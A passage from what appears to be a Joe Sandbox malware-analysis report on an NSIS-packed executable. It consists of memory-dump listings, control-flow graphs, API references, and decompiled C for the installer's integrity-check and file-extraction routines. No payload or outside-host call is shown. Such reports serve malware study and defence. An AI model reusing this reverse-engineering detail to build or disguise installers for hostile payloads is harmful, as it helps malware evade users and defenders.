                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                              • API String ID: 1975747703-1862882193
                                                                                                                              • Opcode ID: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                                                                                                                              • Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
                                                                                                                              • Opcode Fuzzy Hash: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                                                                                                                              • Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40600a 378 4030d7-403105 call 40651a call 405e35 call 40651a GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 389 403110-403127 388->389 391 403129 389->391 392 40312b-403134 call 4034ac 389->392 391->392 401 40325a-403262 call 403019 392->401 402 40313a-403141 392->402 397 403205-40321d call 4034c2 call 4034ac 394->397 398 403227-403251 GlobalAlloc call 4034c2 call 4032b4 394->398 395->380 397->395 421 40321f-403225 397->421 398->395 426 403264-403275 398->426 401->395 405 403143-403157 call 405fc5 402->405 406 4031bd-4031c1 402->406 411 4031cb-4031d1 405->411 424 403159-403160 405->424 410 4031c3-4031ca call 403019 406->410 406->411 410->411 417 4031e0-4031e8 411->417 418 4031d3-4031dd call 4069d4 411->418 417->389 425 4031ee 417->425 418->417 421->395 421->398 424->411 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->411 432 40316b-403172 430->432 431->431 433 40328b-4032a6 SetFilePointer call 405fc5 431->433 432->411 434 403174-40317b 432->434 437 4032ab 433->437 434->411 436 40317d-40319d 434->436 436->395 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->411 441 4031b9-4031bb 440->441 441->411
                                                                                                                              C-Code - Quality: 80%
                                                                                                                              			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe";
				 *0x7a8a6c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe", 0x400);
				_t89 = E0040600A(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040651A(0x7b4800, _t91);
				E0040651A(0x7b7000, E00405E35(0x7b4800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x79f704 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x7a8a74 - _t82;
					if( *0x7a8a74 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40385a
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034C2( *0x7a8a74 + 0x1c);
						_t35 =  &_v24; // 0x40385a
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7a8a70 = _t94;
							 *0x7a8a78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a8a7c =  *0x7a8a7c + 1;
								__eflags =  *0x7a8a7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FC5(0x7a8a80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034C2( *0x7936f8);
					_t65 = E004034AC( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a8a74) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034AC(0x78b6f8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7a8a74;
						if( *0x7a8a74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FC5( &_v44, 0x78b6f8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x7936f8; // 0x4fcbb
						 *0x7a8b00 =  *0x7a8b00 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7a8a74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x79f704; // 0x4fcbf
						if(__eflags < 0) {
							_v12 = E004069D4(_v12, 0x78b6f8, _t90);
						}
						 *0x7936f8 =  *0x7936f8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                                                                                              0x00403085
                                                                                                                              0x00403088
                                                                                                                              0x0040308b
                                                                                                                              0x0040308e
                                                                                                                              0x00403094
                                                                                                                              0x004030a5
                                                                                                                              0x004030aa
                                                                                                                              0x004030bd
                                                                                                                              0x004030c2
                                                                                                                              0x004030c5
                                                                                                                              0x004030cb
                                                                                                                              0x00000000
                                                                                                                              0x004030cd
                                                                                                                              0x004030de
                                                                                                                              0x004030ef
                                                                                                                              0x004030f6
                                                                                                                              0x004030fc
                                                                                                                              0x004030fe
                                                                                                                              0x00403103
                                                                                                                              0x00403105
                                                                                                                              0x004031f0
                                                                                                                              0x004031f2
                                                                                                                              0x004031f7
                                                                                                                              0x004031fe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403200
                                                                                                                              0x00403203
                                                                                                                              0x00403227
                                                                                                                              0x00403227
                                                                                                                              0x0040322c
                                                                                                                              0x00403232
                                                                                                                              0x0040323d
                                                                                                                              0x00403242
                                                                                                                              0x00403242
                                                                                                                              0x00403245
                                                                                                                              0x00403246
                                                                                                                              0x00403247
                                                                                                                              0x00403249
                                                                                                                              0x0040324e
                                                                                                                              0x00403251
                                                                                                                              0x00403264
                                                                                                                              0x00403268
                                                                                                                              0x00403270
                                                                                                                              0x00403275
                                                                                                                              0x00403277
                                                                                                                              0x00403277
                                                                                                                              0x00403277
                                                                                                                              0x0040327f
                                                                                                                              0x0040327f
                                                                                                                              0x00403282
                                                                                                                              0x00403283
                                                                                                                              0x00403283
                                                                                                                              0x00403286
                                                                                                                              0x00403288
                                                                                                                              0x00403288
                                                                                                                              0x00403288
                                                                                                                              0x00403292
                                                                                                                              0x00403298
                                                                                                                              0x004032a6
                                                                                                                              0x004032ab
                                                                                                                              0x00000000
                                                                                                                              0x004032ab
                                                                                                                              0x00000000
                                                                                                                              0x00403251
                                                                                                                              0x0040320b
                                                                                                                              0x00403216
                                                                                                                              0x0040321b
                                                                                                                              0x0040321d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403222
                                                                                                                              0x00403225
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040310b
                                                                                                                              0x00403110
                                                                                                                              0x00403115
                                                                                                                              0x00403119
                                                                                                                              0x00403120
                                                                                                                              0x00403125
                                                                                                                              0x00403127
                                                                                                                              0x00403129
                                                                                                                              0x00403129
                                                                                                                              0x0040312d
                                                                                                                              0x00403132
                                                                                                                              0x00403134
                                                                                                                              0x0040325c
                                                                                                                              0x00403253
                                                                                                                              0x00000000
                                                                                                                              0x00403253
                                                                                                                              0x0040313a
                                                                                                                              0x00403141
                                                                                                                              0x004031bd
                                                                                                                              0x004031c1
                                                                                                                              0x004031c5
                                                                                                                              0x004031ca
                                                                                                                              0x00000000
                                                                                                                              0x004031c1
                                                                                                                              0x0040314a
                                                                                                                              0x0040314f
                                                                                                                              0x00403152
                                                                                                                              0x00403157
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403159
                                                                                                                              0x00403160
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403162
                                                                                                                              0x00403169
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040316b
                                                                                                                              0x00403172
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403174
                                                                                                                              0x0040317b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040317d
                                                                                                                              0x00403183
                                                                                                                              0x0040318c
                                                                                                                              0x00403192
                                                                                                                              0x00403195
                                                                                                                              0x00403197
                                                                                                                              0x0040319d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004031a3
                                                                                                                              0x004031a7
                                                                                                                              0x004031af
                                                                                                                              0x004031af
                                                                                                                              0x004031b2
                                                                                                                              0x004031b5
                                                                                                                              0x004031b7
                                                                                                                              0x004031b9
                                                                                                                              0x004031b9
                                                                                                                              0x00000000
                                                                                                                              0x004031b7
                                                                                                                              0x004031a9
                                                                                                                              0x004031ad
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004031cb
                                                                                                                              0x004031cb
                                                                                                                              0x004031d1
                                                                                                                              0x004031dd
                                                                                                                              0x004031dd
                                                                                                                              0x004031e0
                                                                                                                              0x004031e6
                                                                                                                              0x004031e6
                                                                                                                              0x004031e6
                                                                                                                              0x004031ee
                                                                                                                              0x004031ee
                                                                                                                              0x00000000
                                                                                                                              0x004031ee

                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\aSsc9zh1ex.exe,00000400,?,?,?,?,?,0040385A,?), ref: 004030AA
                                                                                                                                • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                                                                                                                                • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\aSsc9zh1ex.exe,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A), ref: 004030F6
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,Z8@,?,?,?,?,?,0040385A,?), ref: 0040322C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\aSsc9zh1ex.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Z8@$soft
                                                                                                                              • API String ID: 2803837635-1190023407
                                                                                                                              • Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                                                                                                                              • Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
                                                                                                                              • Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                                                                                                                              • Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 727 40176f-401794 call 402da6 call 405e60 732 401796-40179c call 40651a 727->732 733 40179e-4017b0 call 40651a call 405de9 lstrcatW 727->733 739 4017b5-4017b6 call 4067a1 732->739 733->739 742 4017bb-4017bf 739->742 743 4017c1-4017cb call 406850 742->743 744 4017f2-4017f5 742->744 752 4017dd-4017ef 743->752 753 4017cd-4017db CompareFileTime 743->753 746 4017f7-4017f8 call 405fe5 744->746 747 4017fd-401819 call 40600a 744->747 746->747 754 40181b-40181e 747->754 755 40188d-4018b6 call 40557c call 4032b4 747->755 752->744 753->752 756 401820-40185e call 40651a * 2 call 406557 call 40651a call 405b7a 754->756 757 40186f-401879 call 40557c 754->757 769 4018b8-4018bc 755->769 770 4018be-4018ca SetFileTime 755->770 756->742 791 401864-401865 756->791 767 401882-401888 757->767 771 402c33 767->771 769->770 773 4018d0-4018db CloseHandle 769->773 770->773 774 402c35-402c39 771->774 776 4018e1-4018e4 773->776 777 402c2a-402c2d 773->777 779 4018e6-4018f7 call 406557 lstrcatW 776->779 780 4018f9-4018fc call 406557 776->780 777->771 785 401901-402398 779->785 780->785 789 40239d-4023a2 785->789 790 402398 call 405b7a 785->790 789->774 790->789 791->767 792 401867-401868 791->792 792->757
                                                                                                                              C-Code - Quality: 61%
                                                                                                                              			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E60( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405DE9(E0040651A(_t81, 0x7b4000)), ??);
				} else {
					E0040651A();
				}
				E004067A1(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406850(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405FE5(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040600A(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040557C(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8ae8;
						goto L32;
					} else {
						E0040651A("C:\Users\Arthur\AppData\Local\Temp\nso8B47.tmp", _t83);
						E0040651A(_t83, _t81);
						E00406557(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nso8B47.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040651A(_t83, "C:\Users\Arthur\AppData\Local\Temp\nso8B47.tmp");
						_t64 = E00405B7A("C:\Users\Arthur\AppData\Local\Temp\nso8B47.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8ae8 =  &( *0x7a8ae8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040557C();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040557C(0xffffffea,  *(_t86 - 8)); // executed
				 *0x7a8b14 =  *0x7a8b14 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x38));
				_push( *((intOrPtr*)(_t86 - 0x28)));
				_t45 = E004032B4(); // executed
				 *0x7a8b14 =  *0x7a8b14 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406557(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406557(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B7A();
					goto L29;
				}
				goto L33;
			}


















                                                                                                                              0x0040176f
                                                                                                                              0x00401776
                                                                                                                              0x00401782
                                                                                                                              0x00401785
                                                                                                                              0x0040178a
                                                                                                                              0x0040178d
                                                                                                                              0x00401794
                                                                                                                              0x004017b0
                                                                                                                              0x00401796
                                                                                                                              0x00401797
                                                                                                                              0x00401797
                                                                                                                              0x004017b6
                                                                                                                              0x004017bb
                                                                                                                              0x004017bb
                                                                                                                              0x004017bf
                                                                                                                              0x004017c2
                                                                                                                              0x004017c7
                                                                                                                              0x004017c9
                                                                                                                              0x004017cb
                                                                                                                              0x004017d0
                                                                                                                              0x004017d0
                                                                                                                              0x004017db
                                                                                                                              0x004017db
                                                                                                                              0x004017ec
                                                                                                                              0x004017ee
                                                                                                                              0x004017ee
                                                                                                                              0x004017ef
                                                                                                                              0x004017ef
                                                                                                                              0x004017f2
                                                                                                                              0x004017f5
                                                                                                                              0x004017f8
                                                                                                                              0x004017f8
                                                                                                                              0x004017ff
                                                                                                                              0x0040180e
                                                                                                                              0x00401813
                                                                                                                              0x00401816
                                                                                                                              0x00401819
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040181b
                                                                                                                              0x0040181e
                                                                                                                              0x00401874
                                                                                                                              0x00401879
                                                                                                                              0x004015b6
                                                                                                                              0x0040292e
                                                                                                                              0x0040292e
                                                                                                                              0x00402c2a
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c2d
                                                                                                                              0x00000000
                                                                                                                              0x00401820
                                                                                                                              0x00401826
                                                                                                                              0x0040182d
                                                                                                                              0x0040183a
                                                                                                                              0x00401845
                                                                                                                              0x0040185b
                                                                                                                              0x0040185b
                                                                                                                              0x0040185e
                                                                                                                              0x00000000
                                                                                                                              0x00401864
                                                                                                                              0x00401864
                                                                                                                              0x00401865
                                                                                                                              0x00401882
                                                                                                                              0x00402c33
                                                                                                                              0x00402c33
                                                                                                                              0x00402c33
                                                                                                                              0x00401867
                                                                                                                              0x00401867
                                                                                                                              0x00401868
                                                                                                                              0x00401493
                                                                                                                              0x0040239d
                                                                                                                              0x0040239d
                                                                                                                              0x0040239d
                                                                                                                              0x00401865
                                                                                                                              0x0040185e
                                                                                                                              0x00402c35
                                                                                                                              0x00402c39
                                                                                                                              0x00402c39
                                                                                                                              0x00401892
                                                                                                                              0x00401897
                                                                                                                              0x0040189d
                                                                                                                              0x0040189e
                                                                                                                              0x0040189f
                                                                                                                              0x004018a2
                                                                                                                              0x004018a5
                                                                                                                              0x004018aa
                                                                                                                              0x004018b0
                                                                                                                              0x004018b4
                                                                                                                              0x004018b6
                                                                                                                              0x004018be
                                                                                                                              0x004018ca
                                                                                                                              0x004018b8
                                                                                                                              0x004018b8
                                                                                                                              0x004018bc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004018bc
                                                                                                                              0x004018d3
                                                                                                                              0x004018d9
                                                                                                                              0x004018db
                                                                                                                              0x00000000
                                                                                                                              0x004018e1
                                                                                                                              0x004018e1
                                                                                                                              0x004018e4
                                                                                                                              0x004018fc
                                                                                                                              0x004018e6
                                                                                                                              0x004018e9
                                                                                                                              0x004018f2
                                                                                                                              0x004018f2
                                                                                                                              0x00401901
                                                                                                                              0x00401906
                                                                                                                              0x00402398
                                                                                                                              0x00000000
                                                                                                                              0x00402398
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,?,?,00000031), ref: 004017D5
                                                                                                                                • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                                                                                                                                • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,76D723A0,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                                                                                                                                • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,76D723A0,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                                                                                                                                • Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                                                                                                                                • Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                                                                                                                                • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                                                                                                                                • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                                                                                                                                • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
